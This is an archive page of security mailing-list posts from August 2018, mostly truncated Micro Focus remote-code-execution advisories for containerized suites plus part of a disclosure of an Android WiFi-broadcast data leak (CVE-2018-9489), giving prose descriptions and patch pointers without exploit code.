[security bulletin] MFSBGN03821 rev.1 - Micro Focus Hybrid Cloud Management (HCM) containerized suite, Remote Code Execution

2018-08-30 Thread cyber-psrt 
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

Note: the current version of the following document is available here:
https://softwaresupport.hpe.com/document/-/facetsearch/document/KM03236725

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: KM03236725
Version: 1

MFSBGN03821 rev.1 - Micro Focus Hybrid Cloud Management (HCM) containerized
suite, Remote Code Execution

NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.

Release Date: 2018-08-30
Last Updated: 2018-08-30

Potential Security Impact: Remote: Code Execution

Source: Micro Focus, Product Security Response Team

VULNERABILITY SUMMARY
A potential vulnerability has been identified in Micro Focus Container
Deployment Foundation (CDF) available as part of Micro Focus Hybrid Cloud
Management (HCM) containerized suite.
The vulnerabilities could be exploited to Remote Code Execution.

References:

  - PSRT110628
  - CVE-2018-6498

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.

  - Micro Focus Hybrid Cloud Management containerized suites HCM2017.11
HCM2018.02 HCM2018.05

BACKGROUND

  CVSS Base Metrics
  =
  Reference, CVSS V3 Score/Vector, CVSS V2 Score/Vector


RESOLUTION

Micro Focus has made the following mitigation information available to
resolve the vulnerability for the impacted versions of Micro Focus Hybrid
Cloud Management containerized suites:
Please go the link:
[https://softwaresupport.softwaregrp.com/km/KM03235997](https://softwaresuppo
t.softwaregrp.com/km/KM03235997)

HISTORY
Version:1 (rev.1) - 30 August 2018 Initial release

Third Party Security Patches: Third party security patches that are to be 
installed on
systems running Micro Focus products should be applied in accordance with the 
customer's
patch management policy.

Support: For issues about implementing the recommendations of this Security 
Bulletin, contact normal Micro Focus services support channel.
For other issues about the content of this Security Bulletin, send e-mail to  
cyber-p...@microfocus.com.

Report: To report a potential security vulnerability for any supported product:
  Web form: https://www.microfocus.com/support-and-services/report-security
  Email: secur...@microfocus.com

Subscribe:
 To initiate receiving subscriptions for future Micro Focus Security Bulletin 
alerts via Email,  please subscribe here - 
https://softwaresupport.hpe.com/group/softwaresupport/email-notification/-/subscriptions/registerdocumentnotification
 Once you are logged in to the portal, please choose security bulletins under 
product and document types.
 Please note that you will need to sign in using a Passport account. If you do 
not have a Passport account yet, you can create one- its free and easy 
https://cf.passport.softwaregrp.com/hppcf/createuser.do

Security Bulletin Archive:
 A list of recently released Security Bulletins is available here: 
https://softwaresupport.hpe.com/security-vulnerability
 
Software Product Category: The Software Product Category is represented in
the title by the two characters following Micro Focus Security Bulletin.

3P = 3rd Party Software
GN = Micro Focus General Software
MU = Multi-Platform Software

System management and security procedures must be reviewed frequently to 
maintain system integrity.
Micro Focus is continually reviewing and enhancing the security features of 
software products to provide
customers with current secure solutions.

"Micro Focus is broadly distributing this Security Bulletin in order to bring 
to the attention of users of the
affected Micro Focus products the important security information contained in 
this Bulletin. Micro Focus recommends
that all users determine the applicability of this information to their 
individual situations and take appropriate action.
Micro Focus does not warrant that this information is necessarily accurate or 
complete for all user situations and, consequently,
Micro Focus will not be responsible for any damages resulting from user's use 
or disregard of the information provided in
this Security Bulletin. To the extent permitted by law, Micro Focus  disclaims  
all warranties, either express or
implied, including the warranties of merchantability and fitness for a 
particular purpose, title and non-infringement."


Copyright 2017 EntIT Software LLC

Micro Focus shall not be liable for technical or editorial errors or omissions 
contained herein.
The information provided is provided "as is" without warranty of any kind. To 
the extent permitted by law,
neither Micro Focus nor its affiliates, subcontractors or suppliers will be 
liable for incidental, special
or consequential damages including downtime cost; lost profits; damages 
relating to the procurement of
substitute products or services; or damages for loss of data, or software 
restoration.
The information in this document is subject to change without notice. Micro 
Focus and the names of
Micro Focus products referenced herein are trademarks of

[security bulletin] MFSBGN03820 rev.1 - Micro Focus Hybrid Cloud Management (HCM) containerized suites, remote code execution

2018-08-30 Thread cyber-psrt 
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

Note: the current version of the following document is available here:
https://softwaresupport.hpe.com/document/-/facetsearch/document/KM03236722

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: KM03236722
Version: 1

MFSBGN03820 rev.1 - Micro Focus Hybrid Cloud Management (HCM) containerized
suites, remote code execution

NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.

Release Date: 2018-08-30
Last Updated: 2018-08-30

Potential Security Impact: Remote: Code Execution

Source: Micro Focus, Product Security Response Team

VULNERABILITY SUMMARY
A potential vulnerability has been identified in Micro Focus Autopass License
Server (APLS) available as part of Micro Focus Hybrid Cloud Management (HCM)
containerized suites.
The vulnerability could be exploited to Remote Code Execution.

References:

  - PSRT110627
  - CVE-2018-6499

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.

  - Micro Focus Hybrid Cloud Management containerized suites 2017.08,
2017.11, 2018.02, 2018.05

BACKGROUND

  CVSS Base Metrics
  =
  Reference, CVSS V3 Score/Vector, CVSS V2 Score/Vector


Micro Focus would like to thank Lukasz Mikula for reporting the AutoPass
License Server issue tocyber-p...@microfocus.com.

RESOLUTION

Micro Focus has made the following mitigation information available to
resolve the vulnerability for the impacted versions of Micro Focus Hybrid
Cloud Management containerized suites:

HCM 2018.08 has the required fix.Customers who are on HCM2017.08 or higher
or required to upgrade HCM 2018.08 using the supported upgrade path.

HISTORY
Version:1 (rev.1) - 30 August 2018 Initial release

Third Party Security Patches: Third party security patches that are to be 
installed on
systems running Micro Focus products should be applied in accordance with the 
customer's
patch management policy.

Support: For issues about implementing the recommendations of this Security 
Bulletin, contact normal Micro Focus services support channel.
For other issues about the content of this Security Bulletin, send e-mail to  
cyber-p...@microfocus.com.

Report: To report a potential security vulnerability for any supported product:
  Web form: https://www.microfocus.com/support-and-services/report-security
  Email: secur...@microfocus.com

Subscribe:
 To initiate receiving subscriptions for future Micro Focus Security Bulletin 
alerts via Email,  please subscribe here - 
https://softwaresupport.hpe.com/group/softwaresupport/email-notification/-/subscriptions/registerdocumentnotification
 Once you are logged in to the portal, please choose security bulletins under 
product and document types.
 Please note that you will need to sign in using a Passport account. If you do 
not have a Passport account yet, you can create one- its free and easy 
https://cf.passport.softwaregrp.com/hppcf/createuser.do

Security Bulletin Archive:
 A list of recently released Security Bulletins is available here: 
https://softwaresupport.hpe.com/security-vulnerability
 
Software Product Category: The Software Product Category is represented in
the title by the two characters following Micro Focus Security Bulletin.

3P = 3rd Party Software
GN = Micro Focus General Software
MU = Multi-Platform Software

System management and security procedures must be reviewed frequently to 
maintain system integrity.
Micro Focus is continually reviewing and enhancing the security features of 
software products to provide
customers with current secure solutions.

"Micro Focus is broadly distributing this Security Bulletin in order to bring 
to the attention of users of the
affected Micro Focus products the important security information contained in 
this Bulletin. Micro Focus recommends
that all users determine the applicability of this information to their 
individual situations and take appropriate action.
Micro Focus does not warrant that this information is necessarily accurate or 
complete for all user situations and, consequently,
Micro Focus will not be responsible for any damages resulting from user's use 
or disregard of the information provided in
this Security Bulletin. To the extent permitted by law, Micro Focus  disclaims  
all warranties, either express or
implied, including the warranties of merchantability and fitness for a 
particular purpose, title and non-infringement."


Copyright 2017 EntIT Software LLC

Micro Focus shall not be liable for technical or editorial errors or omissions 
contained herein.
The information provided is provided "as is" without warranty of any kind. To 
the extent permitted by law,
neither Micro Focus nor its affiliates, subcontractors or suppliers will be 
liable for incidental, special
or consequential damages including downtime cost; lost profits; damages 
relating to the procurement of
substitute products or services; or damages for loss of data, or software 
restoration.
The information in this

[security bulletin] MFSBGN03818 rev.1 - Micro Focus Operations Bridge containerized suite, Remote Code Execution

2018-08-30 Thread cyber-psrt 
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

Note: the current version of the following document is available here:
https://softwaresupport.hpe.com/document/-/facetsearch/document/KM03236678

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: KM03236678
Version: 1

MFSBGN03818 rev.1 - Micro Focus Operations Bridge containerized suite, Remote
Code Execution

NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.

Release Date: 2018-08-30
Last Updated: 2018-08-30

Potential Security Impact: Remote: Code Execution

Source: Micro Focus, Product Security Response Team

VULNERABILITY SUMMARY
A potential vulnerability has been identified in Micro FocusContainer
Deployment Foundation (CDF) available as part of Micro Focus Operations
Bridge containerized suite.
The vulnerabilities could be exploited to Remote Code Execution.

References:

  - PSRT110626
  - CVE-2018-6498

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.

  - Micro Focus Operations Bridge containerized suite 2017.11, 2018.02,
2018.05

BACKGROUND

  CVSS Base Metrics
  =
  Reference, CVSS V3 Score/Vector, CVSS V2 Score/Vector


RESOLUTION

Micro Focus has made the following mitigation information available to
resolve the vulnerability:
Please run the script availabe in the link
[https://softwaresupport.softwaregrp.com/group/softwaresupport/search-result/
/facetsearch/document/KM03208993](https://softwaresupport.softwaregrp.com/gro
p/softwaresupport/search-result/-/facetsearch/document/KM03208993)

HISTORY
Version:1 (rev.1) - 30 August 2018 Initial release

Third Party Security Patches: Third party security patches that are to be 
installed on
systems running Micro Focus products should be applied in accordance with the 
customer's
patch management policy.

Support: For issues about implementing the recommendations of this Security 
Bulletin, contact normal Micro Focus services support channel.
For other issues about the content of this Security Bulletin, send e-mail to  
cyber-p...@microfocus.com.

Report: To report a potential security vulnerability for any supported product:
  Web form: https://www.microfocus.com/support-and-services/report-security
  Email: secur...@microfocus.com

Subscribe:
 To initiate receiving subscriptions for future Micro Focus Security Bulletin 
alerts via Email,  please subscribe here - 
https://softwaresupport.hpe.com/group/softwaresupport/email-notification/-/subscriptions/registerdocumentnotification
 Once you are logged in to the portal, please choose security bulletins under 
product and document types.
 Please note that you will need to sign in using a Passport account. If you do 
not have a Passport account yet, you can create one- its free and easy 
https://cf.passport.softwaregrp.com/hppcf/createuser.do

Security Bulletin Archive:
 A list of recently released Security Bulletins is available here: 
https://softwaresupport.hpe.com/security-vulnerability
 
Software Product Category: The Software Product Category is represented in
the title by the two characters following Micro Focus Security Bulletin.

3P = 3rd Party Software
GN = Micro Focus General Software
MU = Multi-Platform Software

System management and security procedures must be reviewed frequently to 
maintain system integrity.
Micro Focus is continually reviewing and enhancing the security features of 
software products to provide
customers with current secure solutions.

"Micro Focus is broadly distributing this Security Bulletin in order to bring 
to the attention of users of the
affected Micro Focus products the important security information contained in 
this Bulletin. Micro Focus recommends
that all users determine the applicability of this information to their 
individual situations and take appropriate action.
Micro Focus does not warrant that this information is necessarily accurate or 
complete for all user situations and, consequently,
Micro Focus will not be responsible for any damages resulting from user's use 
or disregard of the information provided in
this Security Bulletin. To the extent permitted by law, Micro Focus  disclaims  
all warranties, either express or
implied, including the warranties of merchantability and fitness for a 
particular purpose, title and non-infringement."


Copyright 2017 EntIT Software LLC

Micro Focus shall not be liable for technical or editorial errors or omissions 
contained herein.
The information provided is provided "as is" without warranty of any kind. To 
the extent permitted by law,
neither Micro Focus nor its affiliates, subcontractors or suppliers will be 
liable for incidental, special
or consequential damages including downtime cost; lost profits; damages 
relating to the procurement of
substitute products or services; or damages for loss of data, or software 
restoration.
The information in this document is subject to change without notice. Micro 
Focus and the names of
Micro Focus products referenced herein are

[security bulletin] MFSBGN03815 rev.1 - Data Center Automation Containerized (DCA) suite, remote code execution

2018-08-30 Thread cyber-psrt 
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

Note: the current version of the following document is available here:
https://softwaresupport.hpe.com/document/-/facetsearch/document/KM03236669

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: KM03236669
Version: 1

MFSBGN03815 rev.1 - Data Center Automation Containerized (DCA) suite, remote
code execution

NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.

Release Date: 2018-08-30
Last Updated: 2018-08-30

Potential Security Impact: Remote: Code Execution

Source: Micro Focus, Product Security Response Team

VULNERABILITY SUMMARY
A potential vulnerabilities has been identified in Micro Focus Autopass
License Server (APLS) and Container Deployment Foundation (CDF) available as
part of Micro Focus Data Center Automation Containerized (DCA) suite.
The vulnerabilities could be exploited to remote code execution.

References:

  - PSRT110625
  - CVE-2018-6498
  - CVE-2018-6499

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.

  - Micro Focus Data Center Automation Containerized (DCA) suite From 2017.01
until 2018.05 (included)

BACKGROUND

  CVSS Base Metrics
  =
  Reference, CVSS V3 Score/Vector, CVSS V2 Score/Vector


Micro Focus would like to thank Lukasz Mikula for reporting the AutoPass
License Server issue tocyber-p...@microfocus.com.

RESOLUTION

Micro Focus has made the following mitigation information available to
resolve the vulnerability for the impacted versions of Data Center
Automation:
Update your DCA Containerized product to DCA Containerized 2018.08 or above
and use the link below to get the script for updating your system:


HISTORY
Version:1 (rev.1) - 30 August 2018 Initial release

Third Party Security Patches: Third party security patches that are to be 
installed on
systems running Micro Focus products should be applied in accordance with the 
customer's
patch management policy.

Support: For issues about implementing the recommendations of this Security 
Bulletin, contact normal Micro Focus services support channel.
For other issues about the content of this Security Bulletin, send e-mail to  
cyber-p...@microfocus.com.

Report: To report a potential security vulnerability for any supported product:
  Web form: https://www.microfocus.com/support-and-services/report-security
  Email: secur...@microfocus.com

Subscribe:
 To initiate receiving subscriptions for future Micro Focus Security Bulletin 
alerts via Email,  please subscribe here - 
https://softwaresupport.hpe.com/group/softwaresupport/email-notification/-/subscriptions/registerdocumentnotification
 Once you are logged in to the portal, please choose security bulletins under 
product and document types.
 Please note that you will need to sign in using a Passport account. If you do 
not have a Passport account yet, you can create one- its free and easy 
https://cf.passport.softwaregrp.com/hppcf/createuser.do

Security Bulletin Archive:
 A list of recently released Security Bulletins is available here: 
https://softwaresupport.hpe.com/security-vulnerability
 
Software Product Category: The Software Product Category is represented in
the title by the two characters following Micro Focus Security Bulletin.

3P = 3rd Party Software
GN = Micro Focus General Software
MU = Multi-Platform Software

System management and security procedures must be reviewed frequently to 
maintain system integrity.
Micro Focus is continually reviewing and enhancing the security features of 
software products to provide
customers with current secure solutions.

"Micro Focus is broadly distributing this Security Bulletin in order to bring 
to the attention of users of the
affected Micro Focus products the important security information contained in 
this Bulletin. Micro Focus recommends
that all users determine the applicability of this information to their 
individual situations and take appropriate action.
Micro Focus does not warrant that this information is necessarily accurate or 
complete for all user situations and, consequently,
Micro Focus will not be responsible for any damages resulting from user's use 
or disregard of the information provided in
this Security Bulletin. To the extent permitted by law, Micro Focus  disclaims  
all warranties, either express or
implied, including the warranties of merchantability and fitness for a 
particular purpose, title and non-infringement."


Copyright 2017 EntIT Software LLC

Micro Focus shall not be liable for technical or editorial errors or omissions 
contained herein.
The information provided is provided "as is" without warranty of any kind. To 
the extent permitted by law,
neither Micro Focus nor its affiliates, subcontractors or suppliers will be 
liable for incidental, special
or consequential damages including downtime cost; lost profits; damages 
relating to

[security bulletin] MFSBGN03814 rev.1 - Service Management Automation (SMA) containerized, Remote Code Execution

2018-08-30 Thread cyber-psrt 
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

Note: the current version of the following document is available here:
https://softwaresupport.hpe.com/document/-/facetsearch/document/KM03236667

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: KM03236667
Version: 1

MFSBGN03814 rev.1 - Service Management Automation (SMA) containerized, Remote
Code Execution

NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.

Release Date: 2018-08-30
Last Updated: 2018-08-30

Potential Security Impact: Remote: Code Execution

Source: Micro Focus, Product Security Response Team

VULNERABILITY SUMMARY
A potential vulnerabilities has been identified in Micro Focus Autopass
License Server (APLS) and Container Deployment Foundation (CDF) available as
part of Micro Focus Service Management Automation (SMA) containerized suites.
The vulnerabilities could be exploited to Remote Code Execution.

References:

  - PSRT110624
  - CVE-2018-6499
  - CVE-2018-6498

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.

  - Micro Focus Service Management Automation (SMA) 2017.11, 2018.02, 2018.05

BACKGROUND

  CVSS Base Metrics
  =
  Reference, CVSS V3 Score/Vector, CVSS V2 Score/Vector


Micro Focus would like to thank Lukasz Mikula for reporting the AutoPass
License Server issue tocyber-p...@microfocus.com.

RESOLUTION

Micro Focus has made the following mitigation information available to
resolve the vulnerability for the impacted versions of Micro Focus Service
Management Automation (SMA) containerized :

For SMA 2017.11 patch
releases:[KM03210103](https://softwaresupport.softwaregrp.com/km/KM03210103)

For SMA 2018.05 patch
releases:[KM03204500](https://softwaresupport.softwaregrp.com/km/KM03204500?
ang=en=us=206728_SSO_PRO)

For SMA 2018.02 patch
releases:[KM03146621](https://softwaresupport.softwaregrp.com/km/KM03146621?
ang=en=us=206728_SSO_PRO)

HISTORY
Version:1 (rev.1) - 30 August 2018 Initial release

Third Party Security Patches: Third party security patches that are to be 
installed on
systems running Micro Focus products should be applied in accordance with the 
customer's
patch management policy.

Support: For issues about implementing the recommendations of this Security 
Bulletin, contact normal Micro Focus services support channel.
For other issues about the content of this Security Bulletin, send e-mail to  
cyber-p...@microfocus.com.

Report: To report a potential security vulnerability for any supported product:
  Web form: https://www.microfocus.com/support-and-services/report-security
  Email: secur...@microfocus.com

Subscribe:
 To initiate receiving subscriptions for future Micro Focus Security Bulletin 
alerts via Email,  please subscribe here - 
https://softwaresupport.hpe.com/group/softwaresupport/email-notification/-/subscriptions/registerdocumentnotification
 Once you are logged in to the portal, please choose security bulletins under 
product and document types.
 Please note that you will need to sign in using a Passport account. If you do 
not have a Passport account yet, you can create one- its free and easy 
https://cf.passport.softwaregrp.com/hppcf/createuser.do

Security Bulletin Archive:
 A list of recently released Security Bulletins is available here: 
https://softwaresupport.hpe.com/security-vulnerability
 
Software Product Category: The Software Product Category is represented in
the title by the two characters following Micro Focus Security Bulletin.

3P = 3rd Party Software
GN = Micro Focus General Software
MU = Multi-Platform Software

System management and security procedures must be reviewed frequently to 
maintain system integrity.
Micro Focus is continually reviewing and enhancing the security features of 
software products to provide
customers with current secure solutions.

"Micro Focus is broadly distributing this Security Bulletin in order to bring 
to the attention of users of the
affected Micro Focus products the important security information contained in 
this Bulletin. Micro Focus recommends
that all users determine the applicability of this information to their 
individual situations and take appropriate action.
Micro Focus does not warrant that this information is necessarily accurate or 
complete for all user situations and, consequently,
Micro Focus will not be responsible for any damages resulting from user's use 
or disregard of the information provided in
this Security Bulletin. To the extent permitted by law, Micro Focus  disclaims  
all warranties, either express or
implied, including the warranties of merchantability and fitness for a 
particular purpose, title and non-infringement."


Copyright 2017 EntIT Software LLC

Micro Focus shall not be liable for technical or editorial errors or omissions 
contained herein.
The information provided is provided "as is" without warranty of any kind. To 
the extent permitted by law,
neither Micro Focus nor its affiliates, subcontractors or suppliers will

[security bulletin] MFSBGN03817 rev.1 - Operations Bridge containerized suite, Remote Code Execution

2018-08-30 Thread cyber-psrt 
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

Note: the current version of the following document is available here:
https://softwaresupport.hpe.com/document/-/facetsearch/document/KM03236648

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: KM03236648
Version: 1

MFSBGN03817 rev.1 - Operations Bridge containerized suite, Remote Code
Execution

NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.

Release Date: 2018-08-30
Last Updated: 2018-08-30

Potential Security Impact: Remote: Code Execution

Source: Micro Focus, Product Security Response Team

VULNERABILITY SUMMARY
A potential vulnerability has been identified in Micro Focus Autopass License
Server (APLS) available as part of Micro Focus Operations Bridge
containerized suite. The vulnerabilities could be exploited to Remote Code
Execution.

References:

  - PSRT110623
  - CVE-2018-6499

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.

  - Micro Focus Operations Bridge containerized suite 2018.05:Component:
Autopass License server 10.6.0 and below

BACKGROUND

  CVSS Base Metrics
  =
  Reference, CVSS V3 Score/Vector, CVSS V2 Score/Vector


Micro Focus would like to thank Lukasz Mikula for reporting the AutoPass
License Server issue to cyber-p...@microfocus.com.

RESOLUTION

Micro Focus has made the following mitigation information available to
resolve the vulnerability for the impacted versions of Autopass License
server: The defect is fixed in OpsBridge Suite 2018.05.001 patch
(OPSB_1):


HISTORY
Version:1 (rev.1) - 30 August 2018 Initial release

Third Party Security Patches: Third party security patches that are to be 
installed on
systems running Micro Focus products should be applied in accordance with the 
customer's
patch management policy.

Support: For issues about implementing the recommendations of this Security 
Bulletin, contact normal Micro Focus services support channel.
For other issues about the content of this Security Bulletin, send e-mail to  
cyber-p...@microfocus.com.

Report: To report a potential security vulnerability for any supported product:
  Web form: https://www.microfocus.com/support-and-services/report-security
  Email: secur...@microfocus.com

Subscribe:
 To initiate receiving subscriptions for future Micro Focus Security Bulletin 
alerts via Email,  please subscribe here - 
https://softwaresupport.hpe.com/group/softwaresupport/email-notification/-/subscriptions/registerdocumentnotification
 Once you are logged in to the portal, please choose security bulletins under 
product and document types.
 Please note that you will need to sign in using a Passport account. If you do 
not have a Passport account yet, you can create one- its free and easy 
https://cf.passport.softwaregrp.com/hppcf/createuser.do

Security Bulletin Archive:
 A list of recently released Security Bulletins is available here: 
https://softwaresupport.hpe.com/security-vulnerability
 
Software Product Category: The Software Product Category is represented in
the title by the two characters following Micro Focus Security Bulletin.

3P = 3rd Party Software
GN = Micro Focus General Software
MU = Multi-Platform Software

System management and security procedures must be reviewed frequently to 
maintain system integrity.
Micro Focus is continually reviewing and enhancing the security features of 
software products to provide
customers with current secure solutions.

"Micro Focus is broadly distributing this Security Bulletin in order to bring 
to the attention of users of the
affected Micro Focus products the important security information contained in 
this Bulletin. Micro Focus recommends
that all users determine the applicability of this information to their 
individual situations and take appropriate action.
Micro Focus does not warrant that this information is necessarily accurate or 
complete for all user situations and, consequently,
Micro Focus will not be responsible for any damages resulting from user's use 
or disregard of the information provided in
this Security Bulletin. To the extent permitted by law, Micro Focus  disclaims  
all warranties, either express or
implied, including the warranties of merchantability and fitness for a 
particular purpose, title and non-infringement."


Copyright 2017 EntIT Software LLC

Micro Focus shall not be liable for technical or editorial errors or omissions 
contained herein.
The information provided is provided "as is" without warranty of any kind. To 
the extent permitted by law,
neither Micro Focus nor its affiliates, subcontractors or suppliers will be 
liable for incidental, special
or consequential damages including downtime cost; lost profits; damages 
relating to the procurement of
substitute products or services; or damages for loss of data, or software 
restoration.
The information in this document

[security bulletin] MFSBGN03813 rev.1 - Network Operations Management (NOM) Suite CDF, Remote Code Execution

2018-08-30 Thread cyber-psrt 
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

Note: the current version of the following document is available here:
https://softwaresupport.hpe.com/document/-/facetsearch/document/KM03236632

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: KM03236632
Version: 1

MFSBGN03813 rev.1 - Network Operations Management (NOM) Suite CDF, Remote
Code Execution

NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.

Release Date: 2018-08-30
Last Updated: 2018-08-30

Potential Security Impact: Remote: Code Execution

Source: Micro Focus, Product Security Response Team

VULNERABILITY SUMMARY
A potential vulnerabilities has been identified in Micro Focus Autopass
License Server (APLS) and Container Deployment Foundation (CDF) available as
part of Micro Focus Network Operations Management (NOM) Suite CDF.
The vulnerabilities could be exploited to Remote Code Execution.

References:

  - PSRT110621
  - CVE-2017-5647
  - CVE-2018-6498

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.

  - Network Operations Management (NOM) Suite 2017.11, 2018.02, and 2018.05

BACKGROUND

  CVSS Base Metrics
  =
  Reference, CVSS V3 Score/Vector, CVSS V2 Score/Vector


Micro Focus would like to thank Lukasz Mikula for reporting the AutoPass
License Server issue tocyber-p...@microfocus.com.

RESOLUTION

MicroFocus requests its customer to replace 2017.11, 2018.02 and 2018.05
version of NOM Suite CDF with fresh install of 2018.08 version of NOM Suite
CDF.

HISTORY
Version:1 (rev.1) - 30 August 2018 Initial release

Third Party Security Patches: Third party security patches that are to be 
installed on
systems running Micro Focus products should be applied in accordance with the 
customer's
patch management policy.

Support: For issues about implementing the recommendations of this Security 
Bulletin, contact normal Micro Focus services support channel.
For other issues about the content of this Security Bulletin, send e-mail to  
cyber-p...@microfocus.com.

Report: To report a potential security vulnerability for any supported product:
  Web form: https://www.microfocus.com/support-and-services/report-security
  Email: secur...@microfocus.com

Subscribe:
 To initiate receiving subscriptions for future Micro Focus Security Bulletin 
alerts via Email,  please subscribe here - 
https://softwaresupport.hpe.com/group/softwaresupport/email-notification/-/subscriptions/registerdocumentnotification
 Once you are logged in to the portal, please choose security bulletins under 
product and document types.
 Please note that you will need to sign in using a Passport account. If you do 
not have a Passport account yet, you can create one- its free and easy 
https://cf.passport.softwaregrp.com/hppcf/createuser.do

Security Bulletin Archive:
 A list of recently released Security Bulletins is available here: 
https://softwaresupport.hpe.com/security-vulnerability
 
Software Product Category: The Software Product Category is represented in
the title by the two characters following Micro Focus Security Bulletin.

3P = 3rd Party Software
GN = Micro Focus General Software
MU = Multi-Platform Software

System management and security procedures must be reviewed frequently to 
maintain system integrity.
Micro Focus is continually reviewing and enhancing the security features of 
software products to provide
customers with current secure solutions.

"Micro Focus is broadly distributing this Security Bulletin in order to bring 
to the attention of users of the
affected Micro Focus products the important security information contained in 
this Bulletin. Micro Focus recommends
that all users determine the applicability of this information to their 
individual situations and take appropriate action.
Micro Focus does not warrant that this information is necessarily accurate or 
complete for all user situations and, consequently,
Micro Focus will not be responsible for any damages resulting from user's use 
or disregard of the information provided in
this Security Bulletin. To the extent permitted by law, Micro Focus  disclaims  
all warranties, either express or
implied, including the warranties of merchantability and fitness for a 
particular purpose, title and non-infringement."


Copyright 2017 EntIT Software LLC

Micro Focus shall not be liable for technical or editorial errors or omissions 
contained herein.
The information provided is provided "as is" without warranty of any kind. To 
the extent permitted by law,
neither Micro Focus nor its affiliates, subcontractors or suppliers will be 
liable for incidental, special
or consequential damages including downtime cost; lost profits; damages 
relating to the procurement of
substitute products or services; or damages for loss of data, or software 
restoration.
The information in this document is subject to change without notice. Micro 
Focus and the names of
Micro Focus products referenced herein are trademarks of Micro Focus in the

Sensitive Data Exposure via WiFi Broadcasts in Android OS [CVE-2018-9489]

2018-08-30 Thread research 
[Blog post here:
https://wwws.nightwatchcybersecurity.com/2018/08/29/sensitive-data-exposure-via-wifi-broadcasts-in-android-os-cve-2018-9489/]

TITLE

Sensitive Data Exposure via WiFi Broadcasts in Android OS [CVE-2018-9489]

SUMMARY

System broadcasts by Android OS expose information about the user’s
device to all applications running on the device. This includes the
WiFi network name, BSSID, local IP addresses, DNS server information
and the MAC address. Some of this information (MAC address) is no
longer available via APIs on Android 6 and higher, and extra
permissions are normally required to access the rest of this
information. However, by listening to these broadcasts, any
application on the device can capture this information thus bypassing
any permission checks and existing mitigations.

Because MAC addresses do not change and are tied to hardware, this can
be used to uniquely identify and track any Android device even when
MAC address randomization is used. The network name and BSSID can be
used to geolocate users via a lookup against a database of BSSID such
as WiGLE or SkyHook. Other networking information can be used by rogue
apps to further explore and attack the local WiFi network.

All versions of Android running on all devices are believed to be
affected including forks (such as Amazon’s FireOS for the Kindle). The
vendor (Google) fixed these issues in Android P / 9 but does not plan
to fix older versions. Users are encouraged to upgrade to Android P /
9 or later. CVE-2018-9489 has been assigned by the vendor to track
this issue. Further research is also recommended to determine whether
this is being exploited in the wild.

BACKGROUND

Android is an open source operating system developed by Google for
mobile phones and tablets. It is estimated that over two billion
devices exist worldwide running Android. Applications on Android are
usually segregated by the OS from each other and the OS itself.
However, interaction between processes and/or the OS is still possible
via several mechanisms.

In particular, Android provides the use of “Intents” as one of the
ways for inter-process communication. A broadcast using an “Intent”
allows an application or the OS to send a message system-wide which
can be listened to by other applications. While functionality exists
to restrict who is allowed to read such messages, application
developers often neglect to implement these restrictions properly or
mask sensitive data. This leads to a common vulnerability within
Android applications where a malicious application running on the same
device can spy on and capture messages being broadcast by other
applications.

Another security mechanism present in the Android is permissions.
These are safeguards designed to protect the privacy of users.
Applications must explicitly request access to certain information or
features via a special “uses-permission” tag in the application
manifest (“AndroidManifest.xml”). Depending on the type of permission
(“normal”, “dangerous”, etc”) the OS may display the permission
information to the user during installation, or may prompt again
during run-time. Some permissions can only be used by system
applications and cannot be used by regular developers.

VULNERABILITY DETAILS

Android OS broadcasts information about the WiFi connection and the
WiFi network interface on a regular basis using two intents:
WifiManager’s NETWORK_STATE_CHANGED_ACTION and WifiP2pManager’s
WIFI_P2P_THIS_DEVICE_CHANGED_ACTION. This information includes the MAC
address of the device, the BSSID and network name of the WiFi access
point, and various networking information such as the local IP range,
gateway IP and DNS server addresses. This information is available to
all applications running on the user’s device.

While applications can also access this information via the
WifiManager, this normally requires the “ACCESS_WIFI_STATE” permission
in the application manifest. Geolocation via WiFi normally requires
the “ACCESS_FINE_LOCATION” or “ACCESS_COARSE_LOCATION” permissions.
Also, on Android versions 6.0 and later, the real MAC address of the
device is no longer available via APIs and will always return the
address “02:00:00:00:00:00”. However, an application listening for
system broadcasts does not need these permissions thus allowing this
information to be captured without the knowledge of the user and the
real MAC address being captured even on Android 6 or higher.

We performed testing using a test farm of mobile device ranging across
multiple types of hardware and Android versions. All devices and
versions of Android tested confirmed this behavior, although some some
devices do not display the real MAC address in the
“NETWORK_STATE_CHANGED_ACTION” intent but they still do within the
“WIFI_P2P_THIS_DEVICE_CHANGED_ACTION” intent. We also tested at least
one fork (Amazon’s FireOS for the Kindle) and those devices displayed
the same behavior.

Because MAC addresses do not change and are tied to hardware,

[security bulletin] MFSBGN03812 rev.1 - Application Performance Management, remote cross-site tracing

2018-08-30 Thread cyber-psrt 
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

Note: the current version of the following document is available here:
https://softwaresupport.hpe.com/document/-/facetsearch/document/KM03235847

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: KM03235847
Version: 1

MFSBGN03812 rev.1 - Application Performance Management, remote cross-site
tracing

NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.

